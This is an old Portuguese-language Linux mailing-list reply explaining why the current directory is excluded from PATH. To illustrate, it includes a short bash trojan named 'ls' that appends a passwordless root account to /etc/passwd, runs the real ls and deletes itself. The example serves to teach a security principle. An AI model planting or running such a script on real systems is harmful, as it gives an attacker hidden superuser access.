On Fri, 15 Feb 2002, Sobrinho wrote:
> Li o seguinte:
> Outro detalhe: por motivos de seguran�a o diret�rio corrente n�o faz parte
> do PATH. Para executar programas no diret�rio corrente � necess�ria a
> utiliza��o dos caracteres ./ antes do nome do arquivo a ser executado.
>
> D�vida: tudo bem entendi, mas de que maneira isso aumenta a seguran�a?
O negocio eh o seguinte, imagine que voce tem um aplicativo qualquer que
voce usa sempre "ls" ele esta no diretorio "/bin". Mas se nos *nix da vida
o PATH funcionasse como nos DOS/Windows, quer dizer o diretorio corrente
antes, senao busca no PATH.
Um usuario teu meio engracadinho cria um script do tipo:
#!/bin/bash
/bin/echo 'toor::0:0:/root:/bin/bash' >> /etc/passwd
/bin/ls $*
/bin/rm -f ./ls
e coloca no diretorio dele (ou outro onde ele pode escrever) com o nome de
'ls'... se voce enquanto administrador executar o comando 'ls' dentro
deste diretorio acabara de criar uma conta sem senha e com privilegios de
superusuario para ele :)
Acho que deu para pegar a ideia...
Antonio.
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Antonio S. Martins Jr. - System Analist | "Only The Shadow Knows |
| WorldNet Internet Maringa - PR - Brasil | what evil lurks in the |
| E-Mail: [EMAIL PROTECTED] | Heart of Men!" |
| [EMAIL PROTECTED] | !!! Linux User: 52392 !!! |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
This e-mail message is 100% Microsoft free!
/"\
\ / CAMPANHA DA FITA ASCII - CONTRA MAIL HTML
X ASCII RIBBON CAMPAIGN - AGAINST HTML MAIL
/ \
Assinantes em 16/02/2002: 2232
Mensagens recebidas desde 07/01/1999: 154799
Historico e [des]cadastramento: http://linux-br.conectiva.com.br
Assuntos administrativos e problemas com a lista:
mailto:[EMAIL PROTECTED]
